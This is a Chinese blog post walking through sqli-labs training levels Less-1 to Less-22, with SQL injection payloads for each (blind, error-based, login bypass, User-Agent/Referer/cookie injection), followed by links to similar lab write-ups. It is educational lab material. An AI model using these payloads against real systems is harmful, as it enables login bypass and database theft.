sql-lab Page-1

最新推荐文章于 2024-11-09 08:46:05 发布
原创 最新推荐文章于 2024-11-09 08:46:05 发布 · 485 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了多种SQL注入攻击手法,包括字符型、数字型、布尔盲注、时间盲注等,展示了如何构造payload来利用这些漏洞,同时涉及了万能钥匙、报错注入和特殊场景下的注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-1

字符型注入,‘

payload:?id=1'and 1%23

Less-2

数字型注入

payload:?id=1 and 1
        ?id=1 and 0

Less-3

字符型注入

payload:?id=1')and 1 %23
        ?id=1')and 0 %23

Less-4

字符型注入

payload:?id=1")and 1%23
        ?id=1")and 0%23

Less-5

布尔盲注和时间盲注

payload:?id'and 1%23
        ?id'and 0%23
        ?id'and sleep(5)%23

Less-6

布尔盲注和时间盲注

payload:?id=1"and 1%23
        ?id=1"and 0%23
        ?id=1"and sleep(5)%23

Less-7

布尔盲注和时间盲注

payload:?id=1'))and 1%23
        ?id=1'))and 0%23
        ?id=1'))and sleep(5)%23

Less-8

时间盲注

payload:?id=1'and 1%23
        ?id=1'and 0%23
        ?id=1'and sleep(5)%23

Less-9

时间盲注

payload:?id=1'and sleep(5)%23

Less-10

时间盲注

payload:?id=1"and sleep(5)%23

Less-11

万能钥匙

payload:
    username:'or 1=1#
    password:123

Less-12

报错注入,字符型注入

payload:
    username:")or 1#
    password:123

Less-13

报错注入,字符型注入,时间盲注

payload:
    username:')or 1#
    password:123

    username:')or sleep(5)#
    password:123

Less-14

字符型注入,报错注入,时间盲注,布尔盲注

payload:
    username:"or 1#
    password:123

Less-15

字符型注入,时间盲注,布尔盲注

payload:
    username:' or 1#
    password:123

Less-16

字符型注入,时间盲注,布尔盲注

payload:
    username:")or 1#
    password:123

Less-17

字符型注入,报错注入,时间盲注

payload:
    username:admin
    newpassword:'or 1#

    username:admin
    newpassword:'or sleep(5)#

Less-18

查看源代码:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

发现user-agent后还有两个字段

user-agent注入,报错注入,需要登录一个对的用户

payload:
通过抓包修改user-agent
1',(extractvalue(1,concat(0x7e,(select database()),0x7e))),(extractvalue(1,concat(0x7e,(select user()),0x7e))))#

Less-19

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

查看代码,发现Referer后还有一个字段

报错注入,Referer注入

payload:
抓包修改Referer的值
1',(extractvalue(1,concat(0x7e,(select database()),0x7e)))#

Less-20

报错注入,时间盲注

先登录一个存在的账户,发现会出现i love you cookie

应该是cookie注入

抓包修改cookie的值

payload:
    Cookie: uname=admin' and (extractvalue(1,concat(0x7e,(select database()),0x7e))) #

Less-21

时间盲注,cookie注入,报错注入

抓包修改cookie的值

直接注入发现报错,编码不对,查看源码后发现,cookie进行了base64加密,所以构造payload的时候也需要使用base64进行加密

payload:
    延迟注入:')or sleep(5)#
        YWRtaW43JylvciBzbGVlcCg1KSM=
    字符型注入:')or 1#
        YWRtaW43JylvciAxIw==
    报错注入:')or (extractvalue(1,concat(0x7e,(select database()),0x7e)))#
        YWRtaW43JylvciAoZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkpIw==

时间盲注:

字符型注入:

报错注入:

Less-22

抓包修改cookies,同Less-21关

payload:
    报错注入:admin7"or (extractvalue(1,concat(0x7e,(select database()),0x7e)))#
            YWRtaW43Im9yIChleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSkj
    时间盲注:admin7"or sleep(5)#
            YWRtaW43Im9yIHNsZWVwKDUpIw==

报错注入:

时间盲注:

Sql-labs 靶场搭建及通关
ming20211016的博客
11-07 3475
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。mysql_real_escape_string函数,宽字节注⼊,符号绕过,联合注⼊。没⽤禁⽤or,and,但过滤了select和union,可以⽤⼤⼩写和重写进⾏绕过。
sql-lab安装(详细版)
weixin_45725490的博客
01-30 2903
sql-lab 相关安装 sql-lab的下载 Git Hub 查询 sql-lab查询 下载以及解压 解压 php小皮面板的安装 服务开启 把相关文件导入到我们设置的网址中 点开管理会有一个打开根目录 把我们刚刚下载解压的文件复制粘贴进去 -进行相关配置 -设置的相关信息与我们刚刚上面数据库的设置要相互照应 -sql文件的导入 -点击操作 点击导入 出现这个界面表示安装完成 ...
LabSQL数据库工具包(完整版)
07-25
下载后直接将解压文件夹复制到labview安装文件目录下的user.lib,例如C:\Program Files\National Instruments\LabVIEW 8.6\user.lib,其他版本亦然 LabSQL 1.1a,网上这个版本很多,但大多数资源都缺几个函数,完整版的大小1.11MB,如果有大小是1.1MB的版本,它里面肯定缺几个函数,分别是查找记录:ADO Recordset Find.vi;删除记录:ADO Recordset Delete Record.vi;添加新记录:ADO Recordset Addnew.vi;设定字段:ADO Set Field Value.vi。大家下载时请注意
sql-lab(ALL 1-65)
lee_maple的博客
03-08 9795
less-1(基于错误的GET单引号字符型注入) id=1 //回显正常 id=1' //报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 id=1' order by 4 # //用
Sql-lab全解
qq_59197927的博客
10-11 690
id=-1 union select null,null,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+group_concat()为输出格式 information_scheam这是个数据库中的表存放着数据库中各个表的信息。这里使用'")判断可能为数值型注入,也就不需要考虑闭合方式,回显大小为3位,位置后两位。
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 4万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
sqli-lab靶场学习(一)——Less1-4(语句闭合,联合注入)
sadoshi的专栏
09-03 1066
最近一段时间想切入安全领域,因为本身有做数据库运维工作,就打算从sql注入方向切入。而sql注入除了学习日常书本上的概念外,需要有个实践的环境,刚好看到sqli-lab这个靶场,就打算先用这个来学习。
SQL联合注入详解-结合SQLi-lab less1
weixin_45118086的博客
07-09 377
SQL注入详解 首先看一看能不能注入 127.0.0.1/sqli-labs/Less-1/?id=1 order by 3 --+ 发现输入多少都不报错 所以推测应该是字符注入 通过以下两句,判断出字段数为3(order by 4报错) 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+ 看一下注入点 127.0.0.1/sqli-labs/Less-1/?id=
sql-labs
qq_62553635的博客
11-05 235
​​​​​​SQLi-LABS Page-1(Basic Challenges) 第一题 根据题目提示,先单引号测试 说明单引号被数据库成功解析, 使用联合表的方式来提取自己想要的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 查字段运用order by 语句。直到order by 4--+时报错,说明只有3个字段。 把原始语句的的结果变为空 接下来查数据库 查表名 使用Group...
sql-lab靶场
最新发布
Zx244349115的博客
11-09 1100
然后我输入id=1’–+时报错,这时候我们可以输入id=1’)–+发现依然报错,之时我试试是不是双括号输入id=1’))–+,发现页面显示正常。使用新的参数sort,通过输入1,2,3表中出现不同数据,该sql语句是order by,sql语句参数没有引号且不能使用联合注入,有报错显示,所以我们可以使用updatexml进行报错。if(a,sleep(10),1)如果a结果是真的,那么执行sleep(10)页面延迟10秒,如果a的结果是假,执行1,页面不延迟。也是不支持的,因此也可以使用。
sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
m0_62879498的博客
01-20 735
(36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别 sql-lab-36 和前面的关卡一样,本题对 ’ 进行了注入,我们可以利用以前学过的办法,使用 %df 进行一个绕过。 判断注入点:?id=1 %df’ and 1=2 – q 判断字段数:id=1 %df’ order by 4-- q 判断显错位:?id=-1 %df’ union select 1,2,3-- q 判断库名:?id=-1 %df’ union select 1,datab
sql-lab 1~10总结(后续持续更新)
m0_62879498的博客
12-11 772
sql注入的一般流程: (1~6关) 判断注入点 当 id=1 and 1=2 – q页面异常是可能存在在sql注入 若页面出现非法,使用其他注入。 判断字段数 order by (根据指定的列对结果进行排序),输出的数字超过列数,报错,因此可以借助此特性,进行列数的判断。 判断回显点 eg: union select 1,2,3 页面显示2,说明回显点在2 注意:要让id的值等于一个不存在的值,这样联合查询的返回值会让union之后的查询结果在数组的第一列。只有让id的只是一个不
sql-lab 通关Less1 -65(深入学习)
ST0new的博客
10-02 2万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
sql-labs(1-65)
Yb_140的博客
03-05 7648
目录 Less-1 Less-2 Less-3 Less-4 Less-5 Less-6 Less-7 Less-8 Less-9 Less-10 Less-11 Less-12 Less-13 Less-14 Less-15 Less-16 Less-17 Less-18 Less-19 Less-20 Less-21 Less-22 Less-23 Less-24 Less-25 Less-25a Less-26 Less-26a Less-2.
Sqli-lab详解(持续更新ing)
weixin_66022252的博客
09-02 2188
根据学习进度会持续更新ing
sql-lab靶场讲解
CN天狼
12-16 7041
sql-lab讲解
sql-lab记录
JDWDXN的博客
10-12 429
sql-lab记录 less7-写文件 secure_file_priv= 默认为空 效果一样,除非=www,否则路径都比较麻烦,只好用…/构造写入www目录中 注意Null和空是两回事,Null根本就没法写入 直接www目录会报错,phpstudy无法设置 所以这里的路径一定要写绝对路径(这里有点奇怪,可以直接设置“/”,为磁盘目录,可据此设置绝对路径)或相对路径,一般这里都是空或者“/”,即需要构造路径以利用 爆路径 id=-1’) union select 1,2,’<?php @eval.
Sql-lab全解_sqllab
2301_77033340的博客
04-12 965
这里推荐在password注入,因为会判断密码和账户的正确性,正确才会回显,如果这里在username注入则会比较麻烦经过测试这里回显位为2位得到数据库名称,和当前表名称得到表列得到数据。
深入探索Anz-cm-lab的PHP开发实例
文件名"anz-cm-lab-master"表明这可能是一个包含多个文件的项目源代码仓库。由于缺少详细的描述,我们将重点放在与PHP相关的内容上,尤其将围绕"anz-cm-lab"这一主题展开讨论,虽然无法提供具体细节,但我们可以探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值